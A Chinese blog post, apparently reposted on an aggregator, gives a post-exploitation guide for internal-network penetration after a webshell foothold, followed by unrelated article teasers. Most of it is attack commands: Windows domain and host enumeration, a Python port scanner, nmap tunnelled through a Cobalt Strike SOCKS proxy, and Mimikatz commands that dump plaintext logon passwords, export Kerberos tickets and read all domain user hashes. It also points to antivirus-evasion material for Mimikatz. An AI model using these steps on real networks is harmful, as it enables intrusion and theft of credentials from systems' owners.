内网渗透-信息收集篇

news2024/11/26 12:32:58

通过webshell或其他方式拿下一台机器,并且存在内网环境,这个时候就在准备进行内网渗透,而在内网渗透之前需要对本地机器进行信息收集,才能够更好的进行内网渗透。

目录

Windows本地基础信息收集

权限查看

判断域存在

查看防火墙状态

计算机基础信息

扫描网段

使用脚本扫描

nmap扫描

cs、msf扫描网段

WMIC信息收集

抓取密码

Mimikatz抓取密码


Windows本地基础信息收集

权限查看

判断是否在内网渗透之前进行提权。

whoami /all

判断域存在

可以利用/domain命令判断是否存在域。可以联合net user 用户 /domain查询用户的详细信息,且判断是否存在域,不存在域会报错。

net user 用户名 /domain
  • 用户名
  • 全名(如果有设置)
  • 描述
  • 密码信息(是否需要更改密码、密码过期等)
  • 上次设置密码的时间
  • 账户激活状态
  • 账户过期时间
  • 用户所属组(本地和全局组)
  • 上次登录时间

 其他命令:

net view /domain #不存在域报错
ipconfig /all  #判断存在域,看DNS后缀
systeminfo #会列出所处的域
net config workstation #查看"工作站域"中显示 登录组 还是 域,是域的话会显示你登录的域名

 定位域控主机

ping 域名
nslookup 域名

查看防火墙状态

netsh advfirewall show allprofiles

计算机基础信息

  • 系统信息:检查操作系统的详细配置信息,判断是否有可以利用的操作系统版本、补丁。
systeminfo
  • 进程情况:可以通过进程列表判断是否存在杀软
tasklist
  • 软件安装情况:查看是否有第三方工具可以进一步留后门或提权
#建议使用wmic工具,速度快
wmic product get name,version
#更详细
wmic product list brief | more
  • 计划任务:可能会看到一些敏感信息,比如需要对某些机器进行交互可能会看到密码之类的定时脚本任务等
schtasks
  • 网络连接情况:可能会发现内网数据库连接之类的情况
netstat -ano

扫描网段

使用脚本扫描

可以自写脚本或者利用网上已有的扫描脚本进行扫描。php,python,perl,ruby,java,c等程序都可以用来做端口扫描,同时还可以使用bat或者shell脚本来做扫描。

#!/usr/bin/env python
 
import socket
 
def get_ip_status(ip,port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((ip,port))
        print('{0} port {1} is open'.format(ip, port))
    except Exception as err:
        print('{0} port {1} is not open'.format(ip,port))
    finally:
        server.close()
 
if __name__ == '__main__':
    host = '10.0.0.1'
    for port in range(20,100):
        get_ip_status(host,port)

nmap扫描

关于利用nmap扫描首先可以通过webshell上传nmap到目标机

#扫描内网有多少主机在线
nmap -sP ip
#端口扫描
nmap ip

在上传不了nmap的情况下也可以通过代理不上传远程使用nmap

比如利用CS代理+proxychains+nmap进行内网扫描:CS开启socks4代理(只能使用tcp协议),所以使用nmap时要使用-sT命令选择tcp协议,要使用-Pn不使用ICMP的ping确认主机存活。

#CS开启socks协议
socks 监听端口
#在攻击机上进行nmap代理扫描
proxychains nmap -sT-Pn ip

分块(f)、时间延迟(delay)、指定已知端口扫描、、、、

cs、msf扫描网段

cs、msf都是常见的内网渗透利用工具,有专门的模块进行端口扫描。

WMIC信息收集

上述的基础信息也可以通过wmic来进行信息收集,wmic是Windows系统自带的功能,负责管理Windows系统的方法和功能。

#检索系统已安装的软件
wmic product list brief | more
或者
wmic product get name,version

#检索系统运行的服务
wmic service list brief | more

#搜索查看进程信息
wmic process list brief | more

#搜索启动程序
wmic startup list brief | more
或者
wmic startup get command,caption

#搜索共享驱动盘
wmic netuse list brief | more

#搜索用户账户
wmic useraccount list brief | more

#搜索计算机域控制器
wmic ntdomain list brief

#搜索登录用户
wmic logon list brief | more

#搜索已安装的安全更新
wmic qfe list brief | more

抓取密码

Mimikatz抓取密码

 Mimikatz是一款用于提取Windows系统中用户凭据的开源工具。

Mimikatz原理:Mimikatz通过逆向获取存储在lsass.exe进程中的明文登录密码。(lsass.exe用于微软Windows系统的安全机制,它用于本地安全和登录策略)。首先使用Mimikatz抓取时必须是管理员权限,在Win10、Win11、Win2012等版本中,系统会开启LSA保护,明文密码字段会显示null。

这里另外提提有关lsass.exe的本地身份认证过程:

首先,用户注销、重启、锁屏后,操作系统会让winlogon.exe显示登录界面,也就是输入框界面,接收用户的输入信息后,将密码交给lsass进程,这个过程中会存一份明文密码,然后将明文密码加密成ntlm hash值,对SAM数据库(SAM数据库包含所有组、账户的信息,如密码hash、账户的SID等)进行比较认证。

#提权
privilege::debug
#抓取明文密码
sekurlsa::logonPasswords
#导出lsass.exe进程中所有的票据
sekurlsa::tickets /export

#列出系统中的票据
kerberos::list
#清除系统中的票据
kerberos::purge
#导入票据到系统中
kerberos::ptc 票据路径

#(在域控上执行)读取所有域用户的哈希
lsadump::lsa /patch
#从sam.hive和system.hive文件中获得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive
#从本地SAM文件中读取密码哈希
token::elevate
lsadump::sam

其实获取本地数据库信息的方法有很多种,比如除了Mimikatz抓取,还可以使用pwdump、powershell抓取。

由于Mimikatz的强大,各大系统对于Mimikatz的防护也是越来越强大,可以去了解一下关于Mimikatz的免杀,参考文章Mimikatz的使用及免杀方向(过360,火狐和WindowsDefinder) - 渗透测试中心 - 博客园

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2235049.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

斯坦福团队研发:手机运行的超GPT-4大模型一夜爆红,下载量突破2000次

在大模型落地应用的过程中,端侧 AI 是非常重要的一个方向。 近日,斯坦福大学研究人员推出的 Octopus v2 火了,受到了开发者社区的极大关注,模型一夜下载量超 2k。 20 亿参数的 Octopus v2 可以在智能手机、汽车、个人电脑等端侧…

【OpenAI】使用O1-Preview模型的3种方式,带你快速提升编程效率!

文章目录 一、模型概述1. GPT-3.5:坚实的基础2. GPT-4.0:突破性的升级3. GPT-4o:多模态处理的先锋4. GPT-4o MINI:轻量高效的AI解决方案5. O1-Preview:推理能力的极致提升 二、性能与应用场景对比性能与应用场景深入解…

一文轻松了解AUTOSAR系统开发步骤顺序

目录 往期推荐 AUTOSAR方法论的典型开发步骤顺序 1. 需求分析(Requirement Analysis) 2. 系统架构设计(System Architecture Design) 3. 软件组件设计与实现(Software Component Design and Implementation&#…

计算机毕业设计Python+图神经网络手机推荐系统 手机价格预测 手机可视化 手机数据分析 手机爬虫 Django Flask Spark 知识图谱

温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:文末有 CSDN 平台官方提供的学长联系方式的名片! 作者简介:Java领…

python基础(1)

声明:学习视频来自b站up主 泷羽sec,如涉及侵权马上删除文章 感谢泷羽sec 团队的教学 视频地址:初识python,环境配置,编程基础以及数据类型_哔哩哔哩_bilibili 一、什么是python Python 是一种高级、解释型、通用编程语…

【大数据学习 | HBASE】hbase的整体架构

hbase的region存储原理图 首先我们看到hbase的组成分为两个大的部分,分别是hmaster和hregionserver,主节点用于协调数据,regionserver用于真正的去管理表,其中regionserver存在多个,他们共同协调管理全有的表&#xff…

软信天成:您企业的数据资产真的安全吗?

您企业的数据资产真的安全吗?当下,数据已成为企业的核心资产,但如何找到、保护这些资产,却是许多企业面临的难题。在此背景下,数据分类分级显得尤为重要。本文将深入探讨数据分类分级,并结合国家标准和行业…

【Android】时区规则库tzdata更新

1 背景: 最近我遇到墨西哥城时区,会出现夏令时,而墨西哥城在2022年底都已经取消夏令时了。 看起来是要更新RK3588上的时区库,我的还是2021a,而现在都已经2024年了 这样能看版本号: cat /system/usr/sha…

国际版JAVA同城打车源码同城服务线下结账系统源码适配PAD支持Android+IOS+H5

架构分析 导航栏:位于界面上方,包含了“数据中心”、“消息”、“用户中心”等主要功能模块的入口,方便用户快速访问。左侧功能模块:在界面的左侧,以列表形式展示了多个功能模块,如“数据中心”、“消息中…

【软服之家-注册安全分析报告-无验证方式导致安全隐患】

前言 由于网站注册入口容易被黑客攻击,存在如下安全问题: 1. 暴力破解密码,造成用户信息泄露 2. 短信盗刷的安全问题,影响业务及导致用户投诉 3. 带来经济损失,尤其是后付费客户,风险巨大,造…

海外营销新利器:米壳AI视频编辑工具全解析

抖知书老师推荐: 随着AI技术的飞速发展,跨境电子商务领域迎来了新的变革。今天,我要向大家介绍一款名为米壳Medio.cool的AI视频营销工具,它专为企业出海而生,助力商品在全球市场上的推广。 米壳Medio.cool以其AI驱动…

常见 HTTP 状态码分类和解释及服务端向前端返回响应时的最完整格式

目前的开发项目,准备明年的国产化,用了十年的自研系统借这个机会全部重写,订立更严格的规范,这里把返回格式及对应状态码记录一下。 常见 HTTP 状态码及解释 HTTP 状态码用于表示客户端请求的响应状态,它们分为五类&a…

Docker在CentOS上的安装与配置

前言 随着云计算和微服务架构的兴起,Docker作为一种轻量级的容器技术,已经成为现代软件开发和运维中的重要工具。本文旨在为初学者提供一份详尽的指南,帮助他们在CentOS系统上安装和配置Docker及相关组件,如Docker Compose和私有…

echart折线图动感设计

效果: 起由: 需求设计大大觉得EChart图表的折线图太过于死板,没有交互感,希望可以实现上图的效果,经过一顿摸索发现EChart折线图effect属性可以让光点沿着折线的路径移动,从而实现动态效果,注意…

2-2.STM32之定时器TIM---输入捕获--实验2( PWMI模式测频率占空比)

输入捕获模式测频率、PWMI模式测频率占空比-CSDN博客 参考这篇文章! 来利用一个GPIO的定时器的两个通道进行捕获占空比和频率,看出可以看出。TI1FP1和TI2FP2,计数值分别在CCR1和CCR2中取, 测周法 IC.c #include "stm32f1…

mathtype中自定义数组维数问题

1 选中红框里的内容 2 设置矩阵维数,即行列数 3 选中中间数字部分,选中左边大括号,或者快捷键ctrll. ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/39ec0c8ed76a46d8b83d484a84ac59a7.png选中内部a

普吕克线( Plücker 线)

普吕克线 在 Plcker 坐标表示中,一条直线 l ‾ 1 \underline{l}_1 l​1​可以用以下两个向量来表示: l ‾ 1 l 1 ϵ m 1 \underline{l}_1 l_1 \epsilon m_1 l​1​l1​ϵm1​ 方向向量 l 1 l_1 l1​:表示直线的方向。动量向量 m 1 m_…

SLMi350DB-DG适用于驱动低边侧和高边侧的MOSFET和IGBT 兼容光耦的单通道隔离驱动器

SLMi350DB-DG是一款兼容光耦的单通道隔离驱动器,具有4A/7A源电流/灌电流以及3.75kVRMS隔离耐压值,适用于驱动低边侧和高边侧的MOSFET和IGBT。与光耦栅极驱动器相比,SLMi350DB-DG具有高共模瞬态抗扰度(CMTI)、低传播延迟和较小的脉宽失真等关键…

帕金森患者必看!这些维生素能帮你改善生活质量!

帕金森病,这个看似遥远的疾病,却悄然影响着许多人的生活质量。作为一种慢性神经退行性疾病,帕金森不仅会导致患者的运动能力受限,还会引发一系列非运动性症状,如便秘、情绪波动等。然而,你知道吗&#xff1…

5G智能对讲终端|北斗有源终端|北斗手持机|单兵|单北斗

在当今这个快速发展的数字化时代,5G技术的广泛应用正以前所未有的速度推动着各行各业的变革。作为这一技术浪潮中的重要一环,5G智能终端QM630D凭借其卓越的性能和多样化的功能,在林业、渔业、安保、电力、交通等多个领域展现出了巨大的应用潜…